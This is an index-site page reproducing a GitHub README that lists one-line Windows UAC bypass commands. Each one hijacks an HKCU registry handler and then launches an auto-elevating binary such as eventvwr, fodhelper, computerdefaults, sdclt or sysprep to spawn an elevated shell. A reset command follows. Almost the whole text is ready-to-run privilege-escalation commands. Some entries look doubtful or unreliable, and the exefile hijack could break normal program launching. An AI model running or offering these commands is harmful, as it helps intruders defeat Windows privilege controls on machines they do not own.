Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/blue0x1/uac-bypass-oneliners

Collection of one-liners to bypass User Account Control (UAC) in Windows. These techniques exploit certain behavior in Windows applications to elevate privileges.
https://github.com/blue0x1/uac-bypass-oneliners

uac uac-bypass uacbypass

Last synced: about 2 months ago
JSON representation

Collection of one-liners to bypass User Account Control (UAC) in Windows. These techniques exploit certain behavior in Windows applications to elevate privileges.

Awesome Lists containing this project

README

        

# uac-bypass-oneliners

Collection of one-liners to bypass User Account Control (UAC) in Windows. These techniques exploit certain behavior in Windows applications to elevate privileges.

Techniques


Using eventvwr.exe:

```

reg add "HKCU\Software\Classes\mscfile\shell\open\command" /v DelegateExecute /t REG_SZ /d "" /f && reg add "HKCU\Software\Classes\mscfile\shell\open\command" /ve /t REG_SZ /d "cmd /c start cmd" /f && eventvwr.exe
```


Using fodhelper.exe:

```

reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "cmd.exe" && start fodhelper.exe

```

Using computerdefaults.exe:

```

reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /d "" /f && reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /t REG_SZ /d "cmd.exe" /f && start computerdefaults.exe
```
Using sdclt.exe:

```

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe /ve /t REG_SZ /d "cmd.exe" /f && start sdclt.exe
```


Using slui.exe:

```

reg add HKCU\Software\Classes\exefile\shell\open\command /ve /t REG_SZ /d "cmd.exe" /f && reg add HKCU\Software\Classes\exefile\shell\open\command /v DelegateExecute /f && start slui.exe
```



Using perfmon.exe:

```

reg add "HKCU\Software\Classes\mscfile\shell\open\command" /v DelegateExecute /t REG_SZ /d "" /f && reg add "HKCU\Software\Classes\mscfile\shell\open\command" /ve /t REG_SZ /d "cmd /c start cmd" /f && start perfmon.exe
```

Using taskmgr.exe:

```
reg add HKCU\Software\Classes\taskmgr\shell\open\command /ve /t REG_SZ /d "cmd.exe" /f && start taskmgr.exe
```

Using ComputerDefaults.exe:


```
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /t REG_SZ /d "cmd.exe" /f && reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /d "" /f && start computerdefaults.exe
```

Using sysprep.exe:

```

reg add HKCU\Software\Classes\AppID\{921C1A8B-9F15-4DA4-9235-0472C3A216E6} /f /ve /t REG_SZ /d "cmd.exe" && start C:\Windows\System32\sysprep\sysprep.exe
```

Using control.exe with /computername:

```

cmd /c reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /ve /d "cmd.exe" /f && control.exe /computername

```

Reset:

```
reg delete "HKCU\Software\Classes\mscfile\shell\open\command" /f && reg delete HKCU\Software\Classes\ms-settings\shell\open\command /f && reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe /f && reg delete HKCU\Software\Classes\exefile\shell\open\command /f && reg delete HKCU\Software\Classes\taskmgr\shell\open\command /f && reg delete HKCU\Software\Classes\AppID\{921C1A8B-9F15-4DA4-9235-0472C3A216E6} /f
```